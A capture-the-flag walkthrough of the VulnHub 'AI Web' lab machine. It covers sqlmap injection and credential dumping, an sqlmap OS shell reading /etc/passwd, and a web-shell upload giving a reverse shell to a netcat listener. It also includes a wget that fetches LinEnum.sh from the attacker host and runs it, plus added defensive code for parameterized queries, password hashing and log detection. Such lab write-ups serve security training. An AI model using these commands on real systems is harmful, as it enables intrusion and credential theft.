AI WEB (VULNHUB)

root@kali:~/Downloads# nmap -A 192.168.65.158
Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-31 17:25 GMT
WARNING: RST from 192.168.65.158 port 80 -- is this port really open?
WARNING: RST from 192.168.65.158 port 80 -- is this port really open?
WARNING: RST from 192.168.65.158 port 80 -- is this port really open?
WARNING: RST from 192.168.65.158 port 80 -- is this port really open?
WARNING: RST from 192.168.65.158 port 80 -- is this port really open?
WARNING: RST from 192.168.65.158 port 80 -- is this port really open?
Nmap scan report for 192.168.65.158
Host is up (0.00018s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http?
MAC Address: 00:0C:29:93:FE:B3 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.21
OS details: Linux 2.4.21
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.18 ms 192.168.65.158

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds

Now open the site in the browser:

http://192.168.65.158/

Let’s browse another page that we got in our port scan. When we open /m3diNf0/ in the browser, we get a Forbidden message as shown in the given image.

http://192.168.65.158/m3diNf0/

During our port scan, we found another directory named /se3reTdir777/uploads/. Let’s try to browse it. On opening it in our Web Browser, we get a similar Forbidden Message as earlier.

http://192.168.65.158/se3reTdir777/uploads/

root@kali:~/Downloads# dirb http://192.168.65.158/m3diNf0/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Aug 31 17:34:43 2019
URL_BASE: http://192.168.65.158/m3diNf0/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.65.158/m3diNf0/ ----
+ http://192.168.65.158/m3diNf0/info.php (CODE:200|SIZE:84266)

-----------------
END_TIME: Sat Aug 31 17:34:46 2019
DOWNLOADED: 4612 - FOUND: 1

Now open it in the browser:

http://192.168.65.158/m3diNf0/info.php

Previously we tried to open se3reTdir777/uploads. Now we browse the se3reTdir777 directory itself. It gives us a User ID submission form, as shown in the image given below.

http://192.168.65.158/se3reTdir777/

Try id 1.

We get:

Id:1
First Name: admin
Last Name: admin

Now intercept the traffic and save the request to a file:

root@kali:~# gedit test

POST /se3reTdir777/ HTTP/1.1
Host: 192.168.65.158
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.65.158/se3reTdir777/
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Connection: close
Upgrade-Insecure-Requests: 1

uid=1&Operation=Submit

root@kali:~/Downloads# sqlmap -r test --dbs --batch

available databases [2]:
[*] aiweb1
[*] information_schema

root@kali:~/Downloads# sqlmap -r test -D aiweb1 --dump-all --batch

Database: aiweb1
Table: systemUser
[3 entries]
+----+-----------+----------------------------------------------+
| id | userName  | password                                     |
+----+-----------+----------------------------------------------+
| 1  | t00r      | RmFrZVVzZXJQYXNzdzByZA==                     |
| 2  | aiweb1pwn | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== |
| 3  | u3er      | TjB0VGhpczBuZUFsczA=                         |
+----+-----------+----------------------------------------------+

[17:41:26] [INFO] table 'aiweb1.systemUser' dumped to CSV file '/root/.sqlmap/output/192.168.65.158/dump/aiweb1/systemUser.csv'
[17:41:26] [INFO] fetching columns for table 'user' in database 'aiweb1'
[17:41:26] [INFO] fetching entries for table 'user' in database 'aiweb1'
Database: aiweb1
Table: user
[3 entries]
+----+----------+-----------+
| id | lastName | firstName |
+----+----------+-----------+
| 1  | admin    | admin     |
| 2  | root     | root      |
| 3  | mysql    | mysql     |
+----+----------+-----------+
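
The application's source is not shown in this walkthrough. The following added example (not the target's code) assumes the uid form builds its query by string concatenation, which is consistent with sqlmap finding the parameter injectable, and puts that weak form beside a hardened one. It uses SQLite in place of MySQL and a constructed tampered body; all function names are hypothetical.

```python
import re
import sqlite3
from urllib.parse import parse_qs

COLUMNS = "id, firstName, lastName"


def build_db():
    """SQLite stand-in for the `user` table, filled with the rows from the dump."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, firstName TEXT, lastName TEXT)"
    )
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "root", "root"), (3, "mysql", "mysql")],
    )
    return conn


def lookup_concat(conn, uid):
    """Assumed weak form: the form value is pasted into the SQL text."""
    return conn.execute(f"SELECT {COLUMNS} FROM user WHERE id = {uid}").fetchall()


def lookup_bound(conn, uid):
    """Hardened form: reject anything that is not a plain integer, then bind it."""
    if not re.fullmatch(r"[0-9]{1,9}", uid):
        raise ValueError("uid must be a positive integer")
    return conn.execute(
        f"SELECT {COLUMNS} FROM user WHERE id = ?", (int(uid),)
    ).fetchall()


def handle_post(conn, body, lookup):
    """Parse an application/x-www-form-urlencoded body and run the lookup."""
    uid = parse_qs(body).get("uid", [""])[0]
    return lookup(conn, uid)


if __name__ == "__main__":
    conn = build_db()
    normal = "uid=1&Operation=Submit"             # body from the request above
    tampered = "uid=1+OR+1%3D1&Operation=Submit"  # constructed: uid carries SQL
    print(handle_post(conn, normal, lookup_concat))    # one row
    print(handle_post(conn, tampered, lookup_concat))  # every row in the table
    print(handle_post(conn, normal, lookup_bound))     # one row
    try:
        handle_post(conn, tampered, lookup_bound)
    except ValueError as exc:
        print("rejected:", exc)
```

The type check matters in addition to binding: MySQL casts a bound string such as `1 OR 1=1` to the number 1 when comparing it with an integer column, so without validation the request would silently succeed instead of being rejected.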

We copied the passwords from the terminal and decoded them using the BurpSuite Decoder. After decoding, we have the following credentials.

Id  Username   Password
1   t00r       FakeUserPassw0rd
2   aiweb1pwn  MyEvilPass_f908sdaf9_sadfasf0sa
3   u3er       N0tThisOneAls0
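
The decoder step works because the password column holds Base64, which is an encoding and not a hash. The following added example (not code from the target) audits the stored values from the dump for that weakness and shows a salted PBKDF2 record that the same audit does not flag; the record format and function names are assumptions made for this example.

```python
import base64
import binascii
import hashlib
import hmac
import os

# Stored values exactly as they appear in the systemUser dump above.
STORED = {
    "t00r": "RmFrZVVzZXJQYXNzdzByZA==",
    "aiweb1pwn": "TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ==",
    "u3er": "TjB0VGhpczBuZUFsczA=",
}


def recoverable_plaintext(value):
    """Return the plaintext if `value` is only Base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError):
        return None
    return text if text and text.isprintable() else None


def audit(column):
    """Map each account to True when its stored password can simply be decoded."""
    return {user: recoverable_plaintext(v) is not None for user, v in column.items()}


def hash_password(password, *, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256 record: scheme$iterations$salt$digest (hex)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute the digest with the stored salt and compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    print(audit(STORED))                       # every account is flagged
    record = hash_password("example-password")  # constructed sample password
    print(recoverable_plaintext(record))       # None: nothing to decode
    print(verify_password("example-password", record))
```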

Now, on this page:

http://192.168.65.158/m3diNf0/info.php

we can see:

DOCUMENT_ROOT : /home/www/html/web1x443290o2sdf92213

root@kali:~/Downloads# sqlmap -r test -D aiweb1 --os-shell

4
y
2

/home/www/html/web1x443290o2sdf92213

That did not work.

Try again:

root@kali:~/Downloads# sqlmap -r test -D aiweb1 --os-shell

4
y
2

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

os-shell>

os-shell> id
do you want to retrieve the command standard output? [Y/n/a] y
No output
os-shell> cat /etc/passwd
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
aiweb1:x:1000:1000:AIWEB1:/home/aiweb1:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
aiweb1pwn:x:1001:1001::/home/aiweb1pwn:/bin/sh

So, we went back to the sqlmap result. It showed us a link, "/se3reTdir777/uploads/tmpujsyk.php". On opening it, we have the upload page as shown in the image given below. It has a Browse button to choose our file, and a field for the location on the victim system where we want the file saved.

http://192.168.65.158/se3reTdir777/uploads/tmpujsyk.php

Upload the file shell.php and click Upload.

It is uploaded to this path:

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

Now open it in the browser:

http://192.168.65.158/se3reTdir777/uploads/shell.php

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.65.158.
Ncat: Connection from 192.168.65.158:34188.
Linux aiweb1 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
18:04:24 up 39 min, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
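
From the defender's side, the steps above leave two traces in the web server's access log: a burst of POSTs to the uid form and requests for PHP files served out of the uploads directory. The following added example (not part of the original walkthrough) checks for both over constructed Apache combined-format lines. Because the request replayed with `-r` carries the browser's own User-Agent header, it keys on behaviour and not on a tool signature. The benign client 192.168.65.20, the timestamps and the threshold of 20 POSTs per minute are assumptions.

```python
import re
from collections import Counter
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
FORM_PATH = "/se3reTdir777/"            # uid form from the walkthrough
UPLOAD_PREFIX = "/se3reTdir777/uploads/"  # directory the files were written to
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")


def build_sample_log():
    """Constructed access-log lines; not captured from the target."""
    ua = '"-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"'
    lines = [
        f'192.168.65.20 - - [31/Aug/2019:17:30:05 +0000] "GET /se3reTdir777/ HTTP/1.1" 200 1200 {ua}',
        f'192.168.65.20 - - [31/Aug/2019:17:30:09 +0000] "POST /se3reTdir777/ HTTP/1.1" 200 1350 {ua}',
    ]
    # Automated testing of the form: 40 POSTs inside one minute.
    lines += [
        f'192.168.65.151 - - [31/Aug/2019:17:41:{s:02d} +0000] "POST /se3reTdir777/ HTTP/1.1" 200 1350 {ua}'
        for s in range(40)
    ]
    lines += [
        f'192.168.65.151 - - [31/Aug/2019:17:58:10 +0000] "GET /se3reTdir777/uploads/tmpujsyk.php HTTP/1.1" 200 700 {ua}',
        f'192.168.65.151 - - [31/Aug/2019:18:04:20 +0000] "GET /se3reTdir777/uploads/shell.php HTTP/1.1" 200 0 {ua}',
        f'192.168.65.20 - - [31/Aug/2019:18:05:00 +0000] "GET /se3reTdir777/uploads/photo.jpg HTTP/1.1" 403 300 {ua}',
    ]
    return lines


def parse(line):
    """Turn one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]   # ignore the query string
    return rec


def script_hits_in_uploads(records):
    """Server-side scripts under the upload directory that were served (2xx)."""
    return [
        (r["ip"], r["path"])
        for r in records
        if r["path"].startswith(UPLOAD_PREFIX)
        and r["path"].lower().endswith(SCRIPT_EXT)
        and r["status"].startswith("2")
    ]


def post_bursts(records, threshold=20):
    """Clients that sent at least `threshold` POSTs to the form in one minute."""
    per_minute = Counter(
        (r["ip"], r["time"].replace(second=0))
        for r in records
        if r["method"] == "POST" and r["path"] == FORM_PATH
    )
    return sorted({ip for (ip, _), n in per_minute.items() if n >= threshold})


def analyse(lines):
    records = [r for r in map(parse, lines) if r]
    return {
        "post_bursts": post_bursts(records),
        "upload_scripts": script_hits_in_uploads(records),
    }


if __name__ == "__main__":
    for name, findings in analyse(build_sample_log()).items():
        print(name, findings)
```

Any 2xx response for a script under an upload directory means the server is executing uploaded content; the matching configuration fix is to serve that directory as static files only.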

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@aiweb1:/$ cd /tmp

www-data@aiweb1:/tmp$ wget http://192.168.65.151:8000/LinEnum.sh
wget http://192.168.65.151:8000/LinEnum.sh
--2019-08-31 18:06:52-- http://192.168.65.151:8000/LinEnum.sh
Connecting to 192.168.65.151:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45639 (45K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh 100%[===================>] 44.57K --.-KB/s in 0.002s

2019-08-31 18:06:52 (21.8 MB/s) - 'LinEnum.sh' saved [45639/45639]

www-data@aiweb1:/tmp$ chmod 777 LinEnum.sh
chmod 777 LinEnum.sh

www-data@aiweb1:/tmp$ ./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.96

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Sat Aug 31 18:07:48 UTC 2019

### SYSTEM ##############################################
[-] Kernel information:
Linux aiweb1 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.15.0-58-generic (buildd@lcy01-amd64-013) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.3 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

[-] Hostname:
aiweb1

### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[-] Users that have previously logged onto the system:
Username Port From Latest
root pts/2 192.168.187.1 Tue Aug 20 10:00:57 +0000 2019
aiweb1 tty1 Wed Aug 21 09:33:12 +0000 2019

[-] Who else is logged on:
18:07:48 up 43 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(pollinate) gid=1(daemon) groups=1(daemon)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(aiweb1) gid=1000(aiweb1) groups=1000(aiweb1),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
uid=111(mysql) gid=113(mysql) groups=113(mysql)
uid=1001(aiweb1pwn) gid=1001(aiweb1pwn) groups=1001(aiweb1pwn)

[-] It looks like we have some admin users:
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=1000(aiweb1) gid=1000(aiweb1) groups=1000(aiweb1),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
aiweb1:x:1000:1000:AIWEB1:/home/aiweb1:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
aiweb1pwn:x:1001:1001::/home/aiweb1pwn:/bin/sh

[-] Super user account(s):
root

[-] Accounts that have recently used sudo:
/home/aiweb1/.sudo_as_admin_successful

[-] Are permissions on /home directories lax:
total 16K
drwxr-xr-x 4 root root 4.0K Aug 20 06:44 .
drwxr-xr-x 24 root root 4.0K Aug 20 05:12 ..
drwxr-xr-x 4 aiweb1 aiweb1 4.0K Aug 20 13:19 aiweb1
drwxr-xr-x 3 root root 4.0K Aug 20 06:44 www

### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_LOG_DIR=/var/log/apache2
LANG=C
OLDPWD=/
INVOCATION_ID=73f28ed600c54fd983b9b4a60b07fa6b
APACHE_LOCK_DIR=/var/lock/apache2
PWD=/tmp
JOURNAL_STREAM=9:30376
APACHE_RUN_GROUP=www-data
APACHE_RUN_DIR=/var/run/apache2
APACHE_RUN_USER=www-data
APACHE_PID_FILE=/var/run/apache2/apache2.pid
SHLVL=2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env

[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/rbash
/bin/dash
/usr/bin/tmux
/usr/bin/screen

[-] Current umask value:
0000
u=rwx,g=rwx,o=rwx

[-] umask value as specified in /etc/login.defs:
UMASK 022

[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Aug 20 06:22 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rw-r--r-- 1 root root 589 Jan 30 2019 mdadm
-rw-r--r-- 1 root root 712 Jan 17 2018 php
-rw-r--r-- 1 root root 191 Aug 5 19:24 popularity-contest

/etc/cron.daily:
total 64
drwxr-xr-x 2 root root 4096 Aug 31 17:25 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 539 Jul 16 18:14 apache2
-rwxr-xr-x 1 root root 376 Nov 20 2017 apport
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 539 Jan 30 2019 mdadm
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
-rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-tools
-rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Aug 5 19:23 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Aug 5 19:23 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Aug 5 19:24 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 211 Nov 12 2018 update-notifier-common

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sat 2019-08-31 18:09:00 UTC 1min 7s left Sat 2019-08-31 17:39:21 UTC 28min ago phpsessionclean.timer phpsessionclean.service
Sun 2019-09-01 00:09:03 UTC 6h left Sat 2019-08-31 17:24:37 UTC 43min ago apt-daily.timer apt-daily.service
Sun 2019-09-01 03:13:46 UTC 9h left Sat 2019-08-31 17:24:37 UTC 43min ago motd-news.timer motd-news.service
Sun 2019-09-01 06:10:00 UTC 12h left Sat 2019-08-31 17:24:37 UTC 43min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Sun 2019-09-01 17:39:37 UTC 23h left Sat 2019-08-31 17:39:37 UTC 28min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2019-09-02 00:00:00 UTC 1 day 5h left Sat 2019-08-31 17:24:37 UTC 43min ago fstrim.timer fstrim.service

6 timers listed.
Enable thorough tests to see inactive timers

### NETWORKING ##########################################
[-] Network and IP info:
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.65.158 netmask 255.255.255.0 broadcast 192.168.65.255
inet6 fe80::20c:29ff:fe93:feb3 prefixlen 64 scopeid 0x20
ether 00:0c:29:93:fe:b3 txqueuelen 1000 (Ethernet)
RX packets 1374531 bytes 89385162 (89.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9260 bytes 3007611 (3.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 112 bytes 9500 (9.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 112 bytes 9500 (9.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

[-] ARP history:
? (192.168.65.254) at 00:50:56:f1:4b:24 [ether] on ens32
? (192.168.65.67) at 00:0c:29:7f:39:f2 [ether] on ens32
? (192.168.65.151) at 00:0c:29:7f:39:f2 [ether] on ens32
_gateway (192.168.65.2) at 00:50:56:f1:c9:80 [ether] on ens32

[-] Nameserver(s):
nameserver 127.0.0.53

[-] Nameserver(s):
Global
DNSSEC NTA: 10.in-addr.arpa
16.172.in-addr.arpa
168.192.in-addr.arpa
17.172.in-addr.arpa
18.172.in-addr.arpa
19.172.in-addr.arpa
20.172.in-addr.arpa
21.172.in-addr.arpa
22.172.in-addr.arpa
23.172.in-addr.arpa
24.172.in-addr.arpa
25.172.in-addr.arpa
26.172.in-addr.arpa
27.172.in-addr.arpa
28.172.in-addr.arpa
29.172.in-addr.arpa
30.172.in-addr.arpa
31.172.in-addr.arpa
corp
d.f.ip6.arpa
home
internal
intranet
lan
local
private
test

Link 2 (ens32)
Current Scopes: DNS
LLMNR setting: yes
MulticastDNS setting: no
DNSSEC setting: no
DNSSEC supported: no
DNS Servers: 192.168.65.2
DNS Domain: localdomain

[-] Default route:
default _gateway 0.0.0.0 UG 100 0 0 ens32

[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 192.168.65.158:34190 192.168.65.151:1234 ESTABLISHED 2672/sh
tcp 0 0 192.168.65.158:34188 192.168.65.151:1234 ESTABLISHED 2667/sh
tcp6 0 0 :::80 :::* LISTEN -
